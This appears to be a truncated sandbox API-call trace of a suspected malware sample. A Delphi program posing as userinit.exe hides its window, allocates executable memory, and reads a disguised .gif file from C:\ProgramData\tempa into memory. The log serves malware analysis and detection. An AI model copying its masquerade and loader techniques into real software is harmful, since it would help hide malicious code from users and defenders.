[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0178.518] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0178.518] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0178.518] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0178.518] GetVersion () returned 0x1db10106
[0178.518] GetCurrentProcessId () returned 0x1c0
[0178.518] GlobalAddAtomA (lpString="Delphi000001C0") returned 0xc102
[0178.518] GetCurrentThreadId () returned 0x414
[0178.518] GlobalAddAtomA (lpString="ControlOfs0040000000000414") returned 0xc101
[0178.518] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000414") returned 0xc183
[0178.519] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0178.519] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0178.519] GetSystemMetrics (nIndex=19) returned 1
[0178.570] GetSystemMetrics (nIndex=75) returned 1
[0178.570] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x521310, fWinIni=0x0 | out: pvParam=0x521310) returned 1
[0178.571] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0178.571] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0178.571] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x50111
[0178.571] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0178.571] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0178.571] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0178.571] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x180067
[0178.571] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0xd0203
[0178.571] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0xe0201
[0178.571] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0xc020d
[0178.572] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0xd01f9
[0178.572] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0xe01f3
[0178.572] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0178.572] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0178.572] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0178.572] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0178.572] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0178.572] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0178.572] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0178.572] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0178.572] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0178.572] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0178.572] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0178.572] GetDC (hWnd=0x0) returned 0x23010850
[0178.572] GetDeviceCaps (hdc=0x23010850, index=90) returned 96
[0178.572] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0178.572] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0178.572] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x52155c) returned 1
[0178.573] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x6fe2f, fWinIni=0x0 | out: pvParam=0x6fe2f) returned 1
[0178.573] CreateFontIndirectA (lplf=0x6fe2f) returned 0x380a084c
[0178.573] GetObjectA (in: h=0x380a084c, c=60, pv=0x6fc20 | out: pv=0x6fc20) returned 60
[0178.573] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x6fcdb, fWinIni=0x0 | out: pvParam=0x6fcdb) returned 1
[0178.573] CreateFontIndirectA (lplf=0x6fdb7) returned 0x300a0847
[0178.573] GetObjectA (in: h=0x300a0847, c=60, pv=0x6fc20 | out: pv=0x6fc20) returned 60
[0178.573] CreateFontIndirectA (lplf=0x6fd7b) returned 0x4a0a0851
[0178.573] GetObjectA (in: h=0x4a0a0851, c=60, pv=0x6fc20 | out: pv=0x6fc20) returned 60
[0178.573] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0178.573] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x6fd8f, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0178.573] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x6fd8f | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0178.573] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x3f0000
[0178.574] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x6fd44 | out: lpWndClass=0x6fd44) returned 0
[0178.574] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0178.574] GetSystemMetrics (nIndex=0) returned 1440
[0178.574] GetSystemMetrics (nIndex=1) returned 900
[0178.574] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0xc01e4
[0178.577] SetWindowLongA (hWnd=0xc01e4, nIndex=-4, dwNewLong=4132847) returned 4219500
[0178.577] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0178.577] SendMessageA (hWnd=0xc01e4, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0178.577] DefWindowProcA (hWnd=0xc01e4, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0178.588] DefWindowProcA (hWnd=0xc01e4, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0xc01c7
[0178.588] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0178.588] SetClassLongA (hWnd=0xc01e4, nIndex=-14, dwNewLong=65575) returned 0x0
[0178.589] GetSystemMenu (hWnd=0xc01e4, bRevert=0) returned 0xe01b9
[0178.590] DeleteMenu (hMenu=0xe01b9, uPosition=0xf030, uFlags=0x0) returned 1
[0178.590] DeleteMenu (hMenu=0xe01b9, uPosition=0xf000, uFlags=0x0) returned 1
[0178.590] DeleteMenu (hMenu=0xe01b9, uPosition=0xf010, uFlags=0x0) returned 1
[0178.590] GetKeyboardLayoutList (in: nBuff=64, lpList=0x6fd10 | out: lpList=0x6fd10) returned 1
[0178.591] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0178.591] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0178.592] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d7b0000
[0178.592] GetProcAddress (hModule=0x6d7b0000, lpProcName="InitializeFlatSB") returned 0x6d7e266f
[0178.592] GetProcAddress (hModule=0x6d7b0000, lpProcName="UninitializeFlatSB") returned 0x6d7e2542
[0178.592] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollProp") returned 0x6d7e1d29
[0178.592] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollProp") returned 0x6d7e238d
[0178.592] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7e20c9
[0178.592] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d7e1fdb
[0178.592] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollRange") returned 0x6d7e1e8d
[0178.592] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d7e1f0f
[0178.592] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollPos") returned 0x6d7e1ccd
[0178.593] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollPos") returned 0x6d7e216d
[0178.593] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7e22be
[0178.593] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7e21e2
[0178.593] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0178.593] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0178.593] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0178.593] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0178.593] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0178.593] GetCurrentThreadId () returned 0x414
[0178.593] GlobalAddAtomA (lpString="WndProcPtr0040000000000414") returned 0xc100
[0178.593] VirtualAlloc (lpAddress=0x524000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x524000
[0178.593] ShowWindow (hWnd=0xc01e4, nCmdShow=0) returned 0
[0178.593] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0178.594] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0178.594] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x6fa90*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x6fa90*=0) returned 0x0
[0178.594] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x6fa88*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x6fa88*=0) returned 0x0
[0178.594] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x6fa88*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x6fa88*=0) returned 0x10be00
[0178.594] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x6fa88*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x6fa88*=0) returned 0x0
[0178.594] GlobalLock (hMem=0x650004) returned 0x21a0020
[0178.594] ReadFile (in: hFile=0x98, lpBuffer=0x21a0020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x6faa4, lpOverlapped=0x0 | out: lpBuffer=0x21a0020*, lpNumberOfBytesRead=0x6faa4*=0x10be00, lpOverlapped=0x0) returned 1
[0178.612] CloseHandle (hObject=0x98) returned 1
[0178.612] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.613] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.613] GlobalUnlock (hMem=0x65000c) returned 0
[0178.613] GlobalReAlloc (hMem=0x65000c, dwBytes=0x4000, uFlags=0x2) returned 0x65000c
[0178.613] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.661] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.661] GlobalUnlock (hMem=0x65000c) returned 0
[0178.661] GlobalReAlloc (hMem=0x65000c, dwBytes=0x6000, uFlags=0x2) returned 0x65000c
[0178.661] GlobalLock (hMem=0x65000c) returned 0x1fa820
[0178.662] GlobalHandle (pMem=0x1fa820) returned 0x65000c
[0178.662] GlobalUnlock (hMem=0x65000c) returned 0
[0178.662] GlobalReAlloc (hMem=0x65000c, dwBytes=0x8000, uFlags=0x2) returned 0x65000c
[0178.662] GlobalLock (hMem=0x65000c) returned 0x200830
[0178.662] GlobalHandle (pMem=0x200830) returned 0x65000c
[0178.663] GlobalUnlock (hMem=0x65000c) returned 0
[0178.663] GlobalReAlloc (hMem=0x65000c, dwBytes=0xa000, uFlags=0x2) returned 0x65000c
[0178.663] GlobalLock (hMem=0x65000c) returned 0x200830
[0178.663] GlobalHandle (pMem=0x200830) returned 0x65000c
[0178.663] GlobalUnlock (hMem=0x65000c) returned 0
[0178.663] GlobalReAlloc (hMem=0x65000c, dwBytes=0xc000, uFlags=0x2) returned 0x65000c
[0178.664] GlobalLock (hMem=0x65000c) returned 0x20a840
[0178.664] GlobalHandle (pMem=0x20a840) returned 0x65000c
[0178.664] GlobalUnlock (hMem=0x65000c) returned 0
[0178.665] GlobalReAlloc (hMem=0x65000c, dwBytes=0xe000, uFlags=0x2) returned 0x65000c
[0178.665] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.665] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.665] GlobalUnlock (hMem=0x65000c) returned 0
[0178.665] GlobalReAlloc (hMem=0x65000c, dwBytes=0x10000, uFlags=0x2) returned 0x65000c
[0178.665] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.666] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.666] GlobalUnlock (hMem=0x65000c) returned 0
[0178.666] GlobalReAlloc (hMem=0x65000c, dwBytes=0x12000, uFlags=0x2) returned 0x65000c
[0178.666] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.666] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.666] GlobalUnlock (hMem=0x65000c) returned 0
[0178.666] GlobalReAlloc (hMem=0x65000c, dwBytes=0x14000, uFlags=0x2) returned 0x65000c
[0178.666] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.667] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.667] GlobalUnlock (hMem=0x65000c) returned 0
[0178.667] GlobalReAlloc (hMem=0x65000c, dwBytes=0x16000, uFlags=0x2) returned 0x65000c
[0178.667] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.668] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.668] GlobalUnlock (hMem=0x65000c) returned 0
[0178.668] GlobalReAlloc (hMem=0x65000c, dwBytes=0x18000, uFlags=0x2) returned 0x65000c
[0178.668] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.668] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.668] GlobalUnlock (hMem=0x65000c) returned 0
[0178.668] GlobalReAlloc (hMem=0x65000c, dwBytes=0x1a000, uFlags=0x2) returned 0x65000c
[0178.668] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.669] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.669] GlobalUnlock (hMem=0x65000c) returned 0
[0178.669] GlobalReAlloc (hMem=0x65000c, dwBytes=0x1c000, uFlags=0x2) returned 0x65000c
[0178.669] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.670] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.670] GlobalUnlock (hMem=0x65000c) returned 0
[0178.670] GlobalReAlloc (hMem=0x65000c, dwBytes=0x1e000, uFlags=0x2) returned 0x65000c
[0178.670] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.670] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.670] GlobalUnlock (hMem=0x65000c) returned 0
[0178.670] GlobalReAlloc (hMem=0x65000c, dwBytes=0x20000, uFlags=0x2) returned 0x65000c
[0178.670] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.671] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.671] GlobalUnlock (hMem=0x65000c) returned 0
[0178.671] GlobalReAlloc (hMem=0x65000c, dwBytes=0x22000, uFlags=0x2) returned 0x65000c
[0178.672] GlobalLock (hMem=0x65000c) returned 0x216820
[0178.673] GlobalHandle (pMem=0x216820) returned 0x65000c
[0178.673] GlobalUnlock (hMem=0x65000c) returned 0
[0178.673] GlobalReAlloc (hMem=0x65000c, dwBytes=0x24000, uFlags=0x2) returned 0x65000c
[0178.673] GlobalLock (hMem=0x65000c) returned 0x216820
[0178.673] GlobalHandle (pMem=0x216820) returned 0x65000c
[0178.673] GlobalUnlock (hMem=0x65000c) returned 0
[0178.673] GlobalReAlloc (hMem=0x65000c, dwBytes=0x26000, uFlags=0x2) returned 0x65000c
[0178.675] GlobalLock (hMem=0x65000c) returned 0x23a830
[0178.675] GlobalHandle (pMem=0x23a830) returned 0x65000c
[0178.675] GlobalUnlock (hMem=0x65000c) returned 0
[0178.675] GlobalReAlloc (hMem=0x65000c, dwBytes=0x28000, uFlags=0x2) returned 0x65000c
[0178.675] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.676] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.676] GlobalUnlock (hMem=0x65000c) returned 0
[0178.676] GlobalReAlloc (hMem=0x65000c, dwBytes=0x2a000, uFlags=0x2) returned 0x65000c
[0178.676] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.676] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.676] GlobalUnlock (hMem=0x65000c) returned 0
[0178.676] GlobalReAlloc (hMem=0x65000c, dwBytes=0x2c000, uFlags=0x2) returned 0x65000c
[0178.676] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.677] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.677] GlobalUnlock (hMem=0x65000c) returned 0
[0178.677] GlobalReAlloc (hMem=0x65000c, dwBytes=0x2e000, uFlags=0x2) returned 0x65000c
[0178.677] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.677] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.677] GlobalUnlock (hMem=0x65000c) returned 0
[0178.677] GlobalReAlloc (hMem=0x65000c, dwBytes=0x30000, uFlags=0x2) returned 0x65000c
[0178.677] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.678] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.678] GlobalUnlock (hMem=0x65000c) returned 0
[0178.678] GlobalReAlloc (hMem=0x65000c, dwBytes=0x32000, uFlags=0x2) returned 0x65000c
[0178.678] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.678] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.678] GlobalUnlock (hMem=0x65000c) returned 0
[0178.678] GlobalReAlloc (hMem=0x65000c, dwBytes=0x34000, uFlags=0x2) returned 0x65000c
[0178.678] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.679] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.679] GlobalUnlock (hMem=0x65000c) returned 0
[0178.679] GlobalReAlloc (hMem=0x65000c, dwBytes=0x36000, uFlags=0x2) returned 0x65000c
[0178.679] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.679] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.679] GlobalUnlock (hMem=0x65000c) returned 0
[0178.679] GlobalReAlloc (hMem=0x65000c, dwBytes=0x38000, uFlags=0x2) returned 0x65000c
[0178.679] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.680] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.680] GlobalUnlock (hMem=0x65000c) returned 0
[0178.680] GlobalReAlloc (hMem=0x65000c, dwBytes=0x3a000, uFlags=0x2) returned 0x65000c
[0178.680] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.680] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.680] GlobalUnlock (hMem=0x65000c) returned 0
[0178.680] GlobalReAlloc (hMem=0x65000c, dwBytes=0x3c000, uFlags=0x2) returned 0x65000c
[0178.680] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.681] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.681] GlobalUnlock (hMem=0x65000c) returned 0
[0178.681] GlobalReAlloc (hMem=0x65000c, dwBytes=0x3e000, uFlags=0x2) returned 0x65000c
[0178.681] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.681] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.681] GlobalUnlock (hMem=0x65000c) returned 0
[0178.681] GlobalReAlloc (hMem=0x65000c, dwBytes=0x40000, uFlags=0x2) returned 0x65000c
[0178.681] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.682] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.682] GlobalUnlock (hMem=0x65000c) returned 0
[0178.682] GlobalReAlloc (hMem=0x65000c, dwBytes=0x42000, uFlags=0x2) returned 0x65000c
[0178.682] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.682] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.682] GlobalUnlock (hMem=0x65000c) returned 0
[0178.682] GlobalReAlloc (hMem=0x65000c, dwBytes=0x44000, uFlags=0x2) returned 0x65000c
[0178.682] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.683] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.683] GlobalUnlock (hMem=0x65000c) returned 0
[0178.683] GlobalReAlloc (hMem=0x65000c, dwBytes=0x46000, uFlags=0x2) returned 0x65000c
[0178.683] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.683] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.683] GlobalUnlock (hMem=0x65000c) returned 0
[0178.683] GlobalReAlloc (hMem=0x65000c, dwBytes=0x48000, uFlags=0x2) returned 0x65000c
[0178.683] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.684] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.684] GlobalUnlock (hMem=0x65000c) returned 0
[0178.684] GlobalReAlloc (hMem=0x65000c, dwBytes=0x4a000, uFlags=0x2) returned 0x65000c
[0178.684] GlobalLock (hMem=0x65000c) returned 0x1f6810
